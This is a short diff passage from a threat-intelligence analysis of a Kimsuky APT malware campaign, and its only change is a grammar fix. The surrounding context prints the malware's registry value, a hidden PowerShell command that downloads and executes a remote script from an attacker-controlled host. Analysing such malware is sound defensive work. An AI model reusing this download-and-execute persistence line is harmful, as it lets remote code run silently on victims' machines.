StrangerealIntel/CyberThreatIntel/North Korea/APT/Kimsuky/2020-03-20/Analysis.md

 $regValue = "cmd.exe /c powershell.exe -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://mybobo.mygamesonline.org/flower01/flower01.ps1')"
 ```

-<h6>The next block is for get the same informations that the MacOS version and for decode the commands send by the C2 to execute to victim.</h6>
+<h6>The next block is for getting the same informations that the MacOS version and for decode the commands send by the C2 to execute to the victim.</h6>

 ```csharp
 function Get_info($logpath)